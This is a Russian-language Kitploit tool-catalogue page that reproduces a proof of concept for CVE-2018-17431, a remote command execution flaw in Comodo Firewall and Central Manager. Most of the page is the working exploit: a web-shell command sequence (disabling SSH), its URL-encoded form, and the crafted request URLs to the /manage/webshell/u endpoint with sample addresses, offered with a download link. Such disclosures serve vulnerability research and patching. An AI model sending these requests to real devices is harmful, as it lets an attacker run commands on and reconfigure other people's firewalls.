Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-17431-Comodo — Comodo | Kitploit
Инструменты/GitHubGitHub/sanan2004/cve-2018-17431-comodo
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-17431-PoC

Доказательство концепции для CVE-2018-17431

Название эксплойта: Comodo Firewall & Central Manager (UTM) Все выпуски до 2.7.0 и 1.5.0 - удаленное выполнение команд (на основе веб-оболочки)

Автор эксплойта: Milad Fadavvi

Домашняя страница вендора: https://www.comodo.com/

Ссылка на ПО: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Версия: до 2.7.0 и 1.5.0

Протестировано на: Windows:firefox/chrome - Kali:firefox

Дата обнаружения: 2018-08-15 (сообщено в тот же день)

Подтверждение существования ошибки: 2018-09-22 (ID тикета: XWR-503-79437)

Эксплойт:

  1. Симуляция веб-оболочки:

    root@kitploit:~
     Например, отключение SSH в веб-оболочке выглядит так:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Кодирование

    root@kitploit:~
     закодировать указанную последовательность с помощью URL-кодирования
     (я использовал плагин Burp Encoder)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Запуск

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (дополнительная клавиша Enter для выполнения команды)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Появится страница с сообщением "Configuration has been altered", и конфигурация изменится!

С помощью этой методики мы можем симулировать все команды веб-оболочки.

Скачать инструмент